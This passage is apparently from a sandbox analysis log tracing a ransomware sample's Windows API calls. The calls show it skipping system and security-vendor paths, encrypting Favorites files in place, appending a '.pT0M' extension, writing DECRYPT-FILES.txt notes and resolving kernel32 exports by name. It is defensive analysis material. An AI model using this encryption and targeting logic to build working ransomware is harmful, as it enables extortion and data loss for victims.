dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.010] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.010] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.010] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.011] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.012] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.012] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.012] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.013] CloseHandle (hObject=0x42c) returned 1 [0085.013] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.013] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.014] CloseHandle (hObject=0x0) returned 0 [0085.014] CloseHandle (hObject=0x428) returned 1 [0085.014] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.014] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.014] GetTickCount () returned 0x114db62 [0085.014] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.014] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.014] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.015] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.015] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.015] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 67 [0085.015] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.pT0M") returned 72 [0085.015] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.pT0M" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.pt0m"), dwFlags=0x0) returned 1 [0085.016] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.016] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.018] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.019] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0085.019] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0085.019] CloseHandle (hObject=0x410) returned 1 [0085.019] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0085.019] lstrcmpW (lpString1="Microsoft Websites", lpString2=".") returned 1 [0085.019] lstrcmpW (lpString1="Microsoft Websites", lpString2="..") returned 1 [0085.019] lstrcatW (in: lpString1="Microsoft Websites", lpString2="\\" | out: lpString1="Microsoft Websites\\") returned="Microsoft Websites\\" [0085.019] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Microsoft Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0085.019] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\Program Files") returned 0x0 [0085.019] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch=":\\Windows") returned 0x0 [0085.019] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\Games\\") returned 0x0 [0085.019] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\Tor Browser\\") returned 0x0 [0085.019] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\ProgramData\\") returned 0x0 [0085.019] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0085.019] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0085.019] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0085.019] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\All Users") returned 0x0 [0085.019] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\IETldCache\\") returned 0x0 [0085.019] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\Local Settings\\") returned 0x0 [0085.019] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\AppData\\Local") returned 0x0 [0085.019] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="AhnLab") returned 0x0 [0085.019] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0085.019] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 59 [0085.019] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.019] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\\\jkbimi8.tmp") returned 71 [0085.020] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0085.022] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 59 [0085.022] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0085.022] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\\\DECRYPT-FILES.txt") returned 77 [0085.022] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0085.023] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0085.024] CloseHandle (hObject=0x414) returned 1 [0085.024] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 59 [0085.024] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*" [0085.024] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaedfd020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaedfd020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0085.024] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.024] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaedfd020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaedfd020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.024] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.024] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.024] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaedfd020, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaedfd020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaedfd020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0085.024] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0085.024] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0085.024] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="DECRYPT-FILES.txt") returned 1 [0085.024] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="autorun.inf") returned 1 [0085.024] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="boot.ini") returned 1 [0085.024] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="desktop.ini") returned 1 [0085.024] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="ntuser.dat") returned -1 [0085.024] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="iconcache.db") returned 1 [0085.024] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="bootsect.bak") returned 1 [0085.024] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="ntuser.dat.log") returned -1 [0085.024] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="thumbs.db") returned -1 [0085.024] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="Bootfont.bin") returned 1 [0085.024] lstrlenW (lpString="IE Add-on site.url") returned 18 [0085.024] lstrcmpiW (lpString1="url", lpString2="lnk") returned 1 [0085.024] lstrcmpiW (lpString1="url", lpString2="exe") returned 1 [0085.024] lstrcmpiW (lpString1="url", lpString2="sys") returned 1 [0085.024] lstrcmpiW (lpString1="url", lpString2="dll") returned 1 [0085.024] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 59 [0085.025] lstrlenW (lpString="IE Add-on site.url") returned 18 [0085.025] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0085.025] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="IE Add-on site.url" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" [0085.025] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.025] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.025] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=133) returned 1 [0085.025] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.025] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.025] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.025] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.025] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.027] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.027] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.028] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.028] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.028] CloseHandle (hObject=0x42c) returned 1 [0085.028] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.028] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.029] CloseHandle (hObject=0x0) returned 0 [0085.029] CloseHandle (hObject=0x428) returned 1 [0085.029] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.030] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.030] GetTickCount () returned 0x114db71 [0085.030] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.030] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.030] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.030] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.031] lstrlenA (lpString="kernel32.dll") returned 12 [0085.031] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.031] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.031] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.031] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.031] lstrlenA (lpString="ADDATOMA") returned 8 [0085.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.031] lstrlenA (lpString="ADDATOMW") returned 8 [0085.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.031] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.031] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.031] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.031] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.031] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.031] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.031] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.031] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.032] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.032] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.032] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.032] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.032] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.032] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.032] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.032] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.032] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.032] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.032] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.032] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.032] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.032] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.032] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.032] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.032] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.032] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.033] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.033] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.033] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.033] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.033] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.033] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.033] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.033] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.033] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.033] lstrlenA 